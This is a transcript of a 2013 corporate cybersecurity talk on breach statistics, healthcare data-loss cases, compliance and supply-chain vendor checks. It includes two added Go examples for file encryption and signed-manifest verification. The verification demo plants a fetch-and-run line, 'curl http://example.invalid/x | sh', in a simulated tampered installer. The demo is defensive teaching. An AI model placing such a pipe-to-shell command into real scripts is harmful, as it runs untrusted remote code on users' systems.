code red: protecting your enterprise and securing your data

Upload: argentum

Post on 12-Mar-2016


DESCRIPTION

Do you remember what you were doing 416 days ago? According to a recent security report from Mandiant, it takes more than a year before the average company realizes it has been a cybercrime target. Cybercrime expert Theresa Payton provides an overview of emerging security threats facing U.S. businesses as well as the latest developments in how companies can safeguard their brand, assets, information, intellectual property, and finances to prevent the worst-case scenario from happening. Payton also shares actionable and strategic solutions to stop hackers, saboteurs, fraudsters, and cybercriminals in their tracks, while describing ways businesses can combat “homegrown” insider threats. >> Faculty: Theresa Payton, Founder, Fortalice

TRANSCRIPT

Page 1: Code Red: Protecting Your Enterprise and Securing Your Data
Page 2: Code Red: Protecting Your Enterprise and Securing Your Data

Video | What Happened

•  Directions to the A/V team - Please play from the beginning and cut it at 1:25…
•  Video – http://www.youtube.com/watch?v=3FelJwb4NCM

Theresa Payton © 2013 All Rights Reserved

Page 3: Code Red: Protecting Your Enterprise and Securing Your Data
Page 4: Code Red: Protecting Your Enterprise and Securing Your Data

Uber Connected? | What to Watch?

6 billion people have mobile phones

The number of networked devices = the globe's population

Internet connectivity ubiquitous!

Page 5: Code Red: Protecting Your Enterprise and Securing Your Data

Uber Connected? | What to Watch?

1 minute just went by…what happened?

639,800 GB was transferred…
135 botnet infections
1,300 new mobile users
204 million emails sent
20 new victims of identity theft
100+ LinkedIn accounts added
20 million photo views
30 hours of video uploaded (+1.3M views)
100,000 new tweets
277,000 Facebook logins

Source: Intel, "What Happens in an Internet Minute?", posted by Krystal Temple, March 13, 2012.

Page 6: Code Red: Protecting Your Enterprise and Securing Your Data

Memory Check| Current State of Affairs

What were you doing 243 days ago?

Page 7: Code Red: Protecting Your Enterprise and Securing Your Data

Current State of Affairs| Incoming!

Something is discovered every 90 seconds.

What is it?

Page 8: Code Red: Protecting Your Enterprise and Securing Your Data

Breach Discovery| Bold New Approach Needed

[Chart: M-Trends 2013, Mandiant. 63% of breached organizations were notified of the breach by an external party; only 37% discovered it themselves.]

Page 9: Code Red: Protecting Your Enterprise and Securing Your Data

Current State of Affairs| Booming Economy? Where?

Russia's cyber crime…but it's other places too.

Latest estimated value of the country's cyber crime market is now $2.3 billion, almost double the prior year's $1.2B.

$1.8 billion of that is from what? You guessed it…online fraud via banking malware, phishing, and spam.

Source: State and Trends of the Russian Digital Crime Market, released April 2012

Page 10: Code Red: Protecting Your Enterprise and Securing Your Data

Current State of Affairs| Assumptions

For IT risk and security, staffing levels should be between 5% and 12% of your total staff, but many organizations have < 3%.

Chris Byrne, Gartner Security and Risk Summit, 2012

Page 11: Code Red: Protecting Your Enterprise and Securing Your Data

Current State of Affairs| Industry Challenges

What Keeps Me Up At Night? Businesses in a recent survey indicated:

50%+ : $/time not justified by the threat.
75% : less than 3 hours per year of security training, and almost half offer zero.
47% : recovery plans are Dilbert style!
6 out of 10 : go ahead and talk to strangers (unsecured WiFi).

Source: National Cyber Security Alliance and Visa poll, business' cyber security practices & attitudes

Page 12: Code Red: Protecting Your Enterprise and Securing Your Data

Black Swan | Risk Management

Convincing others to prepare to invest in an event that will "never" happen

•  "Zero Risk" does not exist but "Managed Risk" does
•  Making security the business enabler vs. productivity roadblock

Page 13: Code Red: Protecting Your Enterprise and Securing Your Data

Black Swan | Risk Management

"Senior living providers are at particular risk because of the nature of the information they store on residents"

John Atkinson, Managing Partner at The Willis Group Holdings

Page 14: Code Red: Protecting Your Enterprise and Securing Your Data

Black Swan | Risk Management

"Over the weekend of November 17-18, 2012, five laptops were stolen from Riderwood's physical therapy offices."

On the hard drive? Unencrypted patient names, visits, addresses and policy numbers

Lessons Learned:
Data storage on hard drives
Encrypting files

Page 15: Code Red: Protecting Your Enterprise and Securing Your Data

Black Swan | Risk Management

HHS reason for hefty fine? Unencrypted data, did not do regular risk assessments

January 2013: "…the Hospice of North Idaho became HHS's first facility with fewer than 500 residents to be fined for a patient information data breach, saddling the hospice a whopping $50,000 bill."

Stolen? Laptop (in 2010)

Lessons Learned:
Data storage on hard drives
Delete files you do not need anymore
Schedule periodic risk assessments
Encrypting files
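Both laptop cases above come down to the same lesson: records sat on the disk in the clear, so whoever took the hardware took the data. The following is an added example, not code from Payton's deck or from Fortalice, showing what "encrypting files" concretely buys you: authenticated encryption of a file at rest with AES-256-GCM from the Go standard library. A thief who has the file but not the key sees only random-looking bytes, and any modification of the file fails the authentication tag check instead of quietly yielding altered records. The function names (NewKey, Seal, Open, EncryptFile, DecryptFile), the sample visit record and the temp-file layout are assumptions for illustration; in production the key would be held in a key manager or hardware-backed store rather than in memory next to the data, and whole-disk encryption would protect the laptop as a whole.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/rand"
	"errors"
	"fmt"
	"io"
	"os"
	"path/filepath"
)

// NewKey returns a fresh random 256-bit AES key. Assumption for this example:
// the key is kept in memory; a real deployment keeps it in a key manager or
// hardware-backed store, never on the same disk as the data it protects.
func NewKey() ([]byte, error) {
	key := make([]byte, 32)
	if _, err := io.ReadFull(rand.Reader, key); err != nil {
		return nil, err
	}
	return key, nil
}

// Seal encrypts plaintext with AES-256-GCM and returns nonce || ciphertext || tag.
// A fresh random nonce is drawn per call; a nonce must never repeat under one key.
func Seal(key, plaintext []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	nonce := make([]byte, gcm.NonceSize())
	if _, err := io.ReadFull(rand.Reader, nonce); err != nil {
		return nil, err
	}
	// gcm.Seal appends the ciphertext and the 16-byte tag to the nonce prefix.
	return gcm.Seal(nonce, nonce, plaintext, nil), nil
}

// Open decrypts data produced by Seal. If the nonce, ciphertext or tag was
// altered, or a different key is used, the authentication check fails and an
// error is returned instead of corrupted plaintext.
func Open(key, data []byte) ([]byte, error) {
	block, err := aes.NewCipher(key)
	if err != nil {
		return nil, err
	}
	gcm, err := cipher.NewGCM(block)
	if err != nil {
		return nil, err
	}
	if len(data) < gcm.NonceSize()+gcm.Overhead() {
		return nil, errors.New("ciphertext too short")
	}
	nonce, ct := data[:gcm.NonceSize()], data[gcm.NonceSize():]
	return gcm.Open(nil, nonce, ct, nil)
}

// EncryptFile seals the contents of src into dst (owner-only permissions).
func EncryptFile(key []byte, src, dst string) error {
	pt, err := os.ReadFile(src)
	if err != nil {
		return err
	}
	ct, err := Seal(key, pt)
	if err != nil {
		return err
	}
	return os.WriteFile(dst, ct, 0o600)
}

// DecryptFile opens a file written by EncryptFile and returns the plaintext.
func DecryptFile(key []byte, src string) ([]byte, error) {
	ct, err := os.ReadFile(src)
	if err != nil {
		return nil, err
	}
	return Open(key, ct)
}

func main() {
	key, err := NewKey()
	if err != nil {
		panic(err)
	}
	dir, err := os.MkdirTemp("", "phi")
	if err != nil {
		panic(err)
	}
	defer os.RemoveAll(dir)
	plain := filepath.Join(dir, "visits.csv")
	sealed := plain + ".enc"
	// Constructed sample record standing in for a physical therapy visit log.
	if err := os.WriteFile(plain, []byte("J. Doe,2012-11-16,POLICY-0001\n"), 0o600); err != nil {
		panic(err)
	}
	if err := EncryptFile(key, plain, sealed); err != nil {
		panic(err)
	}
	got, err := DecryptFile(key, sealed)
	fmt.Printf("recovered %q, err=%v\n", got, err)
}
```

Run it with `go run`. The GCM mode matters: a plain block cipher mode would still hide the data, but would not tell you that a stolen-and-returned file had been altered, which is the "tamper evidence" the vendor checklist later in this deck asks for.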

Page 16: Code Red: Protecting Your Enterprise and Securing Your Data

Black Swan | Risk Management

HITECH Act requirement: organizations that hold protected health information (PHI) must have a plan of action in the event they experience a security breach.

And…regulated by HIPAA? Breach reports go to multiple outlets:
Department of Health and Human Services
the media
affected individuals

Page 17: Code Red: Protecting Your Enterprise and Securing Your Data

Does Spending=Secure?| Invalid Assumptions

Case Study: Target Corp. and Oracle Corp.
Hacking contest for large companies
Target spends about 1/2 as much on security annually as Oracle
Results? Target was more difficult to hack

Yurcan, Bryan. Panel Discussion: The Role of the Bank CIO. Bank Systems & Technology: October 20, 2011
Kapner, Suzanne. Hackers Press the 'Schmooze' Button. WSJ: October 31, 2011

Page 18: Code Red: Protecting Your Enterprise and Securing Your Data

Current State of Affairs| Innovation

How A Happy Meal = Better Security!

A case study in innovation.

Page 19: Code Red: Protecting Your Enterprise and Securing Your Data

5 Tech Trends | Enormous Implications

•  BYOD – without CYA creates BYOB
•  The new 4 letter word is SMIT
•  Who knew cybercriminals were so "socially minded"?
•  Malware morphs beyond detection awareness
•  Why the Cloud could be your "Father's Oldsmobile" and when will we get Big Data analytics?

[Graphic labels: BYOD, SMIT, SO SOCIAL!, MORPH TO THE MAX, PORSCHE WRAPPER, DATA MAPS, DIGITAL ASSETS]

Page 20: Code Red: Protecting Your Enterprise and Securing Your Data

Top Digital Assets?| Actions

Security and Privacy Settings

BYOD access…hmmm

Cloud?

Free Wi-Fi at Your Peril

What protections do you have for the “POTUS and VP” assets?

Page 21: Code Red: Protecting Your Enterprise and Securing Your Data

Plan of Attack| 5 Step Plan

Training
Policies and Procedures
Practicing Digital Doomsday
Technology Tuning
Security in the Supply Chain

Page 22: Code Red: Protecting Your Enterprise and Securing Your Data

80/20 Rule| 2 Steps = Biggest Impact

Best Practices & Improved Security Policies: 58%
Informed, Aware & Engaged Employees: 20%
Technology Improvements: 18%
Gov't Regulation & Law Enforcement: 4%

Source: 2012 Bit9 Cyber Security Research Report

Page 23: Code Red: Protecting Your Enterprise and Securing Your Data

Back at the Office| Actions

Basics
Top Digital Assets – who are they?
Training
Policies and Procedures
Patches
Configurations
Hardening
Encryption of PHI emails
Encryption of data

Page 24: Code Red: Protecting Your Enterprise and Securing Your Data

Back at the Office| Actions

4 TIPS TO REMEMBER

Password protect
Never loan devices or WiFi
Treat old devices and backup information like gold
Timeout feature

Page 25: Code Red: Protecting Your Enterprise and Securing Your Data

Back at the Office| Actions

Next Phase
Incident Management
Disaster Recovery
Digital Disaster
Technology Tuning
Supply Chain Review

Page 26: Code Red: Protecting Your Enterprise and Securing Your Data

Back at the Office| Actions

• Check the box! DANGER! Trap: focusing on regulatory compliance instead of comprehensive security.
• Looks good but is it safe? A lack of security features consistently built into elderly care and health care systems.
• 411 Breakdown: capability gap for sharing information on cybersecurity and other issues.
• No Measurements: lack of metrics for evaluating cybersecurity.

Page 27: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Let’s Get to Work!

5 Things…
•  Training – just say NO to CBT only
•  Document IT AND End User policies and procedures
•  Where will your team get stuck during the digital doomsday exercise?
•  90% of our clients last year had the core technology they needed but…
•  You are the weakest link? No!

Page 28: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Practice Makes Perfect

Here's your next staff meeting agenda

Current State Assessment – Spend Dedicated Time Discussing:
What security measures are in place? What do they protect?
How vulnerable are you? How vulnerable are your clients?
What client communication and response plans exist?
Do you test incident management plans using plausible scenarios?

Options Analysis
What could be done within the next 90 days to improve security?
How would your company respond to losing intellectual property, internal emails posted on a public website, or worse?
How can each security layer be enhanced, at what cost and at what impact to productivity?

Page 29: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Practice Makes Perfect

Staff Meeting - Practice the Disaster

Name Your Worst Digital Nightmare: digital death, what happened?
Go around the room and ask the team to tell you the escalation plan and their list of actions.
Do you know who to call? Do you know what to do?
How do you stop the bad guys from taking more? Do you need outside help?
Time yourself…how long does it take before you create a plan of action?

Page 30: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Practice Makes Perfect

Supply Chain Security – 8 Vendor Checkpoints
Information Security
Identity Management
Endpoint and Server Security
Gateway and Network Security
Web and Application Security
Physical and Personnel Security
Security Management
Intellectual Property, Customer Information, and Financial Transaction Security

Page 31: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Practice Makes Perfect

Supply Chain Security – Vendor Must Answer:
Chain of Custody
Least Privilege Access
Separation of Duties
Tamper Resistance and Evidence
Persistent Compliance Management
Code Testing and Verification
Trusted and Vetted Staff
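"Chain of custody", "tamper resistance and evidence" and "code testing and verification" are easier to ask a vendor about when you can picture the mechanism. The following is an added example, not code from Payton's deck or from Fortalice, of the simplest form that mechanism takes for a software delivery: the vendor ships a manifest of SHA-256 hashes for every artifact, signed with an Ed25519 key, and the customer verifies the signature and re-hashes each file before anything is installed. A swapped installer, a file added in transit, a dropped file, or an edited manifest each fail with a different error. All names (VendorKeys, BuildManifest, Sign, Verify), the sample files and the assumption that the customer already holds the vendor's public key through a separate channel are constructed for illustration; the standard library calls (crypto/ed25519, crypto/sha256) are real.

```go
package main

import (
	"crypto/ed25519"
	"crypto/rand"
	"crypto/sha256"
	"encoding/hex"
	"errors"
	"fmt"
	"sort"
	"strings"
)

// Manifest maps an artifact's file name to the hex SHA-256 of its contents.
type Manifest map[string]string

// VendorKeys generates the vendor's Ed25519 signing key pair. The private key
// stays on the vendor's release system; only the public key reaches customers,
// out of band (assumption for this example: the customer already holds it).
func VendorKeys() (ed25519.PublicKey, ed25519.PrivateKey, error) {
	return ed25519.GenerateKey(rand.Reader)
}

// BuildManifest hashes every artifact in a delivery (held in memory here).
func BuildManifest(files map[string][]byte) Manifest {
	m := Manifest{}
	for name, data := range files {
		sum := sha256.Sum256(data)
		m[name] = hex.EncodeToString(sum[:])
	}
	return m
}

// Encode renders the manifest in a canonical sorted "hash  name" line format
// (the layout sha256sum uses) so signer and verifier hash identical bytes.
func (m Manifest) Encode() []byte {
	names := make([]string, 0, len(m))
	for n := range m {
		names = append(names, n)
	}
	sort.Strings(names)
	var b strings.Builder
	for _, n := range names {
		fmt.Fprintf(&b, "%s  %s\n", m[n], n)
	}
	return []byte(b.String())
}

// Sign is the vendor side: a detached signature over the encoded manifest.
func Sign(priv ed25519.PrivateKey, m Manifest) []byte {
	return ed25519.Sign(priv, m.Encode())
}

// Verify is the customer side. It checks the signature first (a forged or
// edited manifest fails here), then that every listed artifact arrived with
// the promised hash, and finally that nothing arrived the vendor did not list.
func Verify(pub ed25519.PublicKey, m Manifest, sig []byte, files map[string][]byte) error {
	if !ed25519.Verify(pub, m.Encode(), sig) {
		return errors.New("manifest signature invalid: not signed by the vendor key or altered after signing")
	}
	for name, want := range m {
		data, ok := files[name]
		if !ok {
			return fmt.Errorf("%s: listed in manifest but not delivered", name)
		}
		sum := sha256.Sum256(data)
		if got := hex.EncodeToString(sum[:]); got != want {
			return fmt.Errorf("%s: contents changed after signing (got %s..., manifest %s...)", name, got[:12], want[:12])
		}
	}
	for name := range files {
		if _, ok := m[name]; !ok {
			return fmt.Errorf("%s: delivered but absent from the signed manifest", name)
		}
	}
	return nil
}

func main() {
	pub, priv, err := VendorKeys()
	if err != nil {
		panic(err)
	}
	// Constructed sample delivery standing in for a vendor software drop.
	files := map[string][]byte{
		"install.sh": []byte("#!/bin/sh\necho installing\n"),
		"app.bin":    []byte("constructed binary contents"),
	}
	m := BuildManifest(files)
	sig := Sign(priv, m)
	fmt.Println("clean delivery:  ", Verify(pub, m, sig, files))
	// Simulate tampering in transit: the installer script is swapped.
	files["install.sh"] = []byte("#!/bin/sh\necho installing\ncurl http://example.invalid/x | sh\n")
	fmt.Println("altered delivery:", Verify(pub, m, sig, files))
}
```

The order of checks is the point: verify the signature before trusting a single hash in the manifest, because an attacker who can replace files can replace an unsigned manifest just as easily. Ask the vendor what plays the role of the signing key here, who can use it (least privilege, separation of duties), and how you would learn if it were lost.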

Page 32: Code Red: Protecting Your Enterprise and Securing Your Data

Next Steps | Cloud in your future?

Draw up the Pre-Nup First! When you "break up", what are their sanitization policies, so you get your data back and they don't keep your digital footprints?

Need a "Go to guide"? Try NIST: NIST Cloud Computing Reference Architecture, SP 500-292

Page 33: Code Red: Protecting Your Enterprise and Securing Your Data

Questions? [email protected]

@FortaliceLLC
Fortalice-LLC
fortalicesolutions.blogspot.com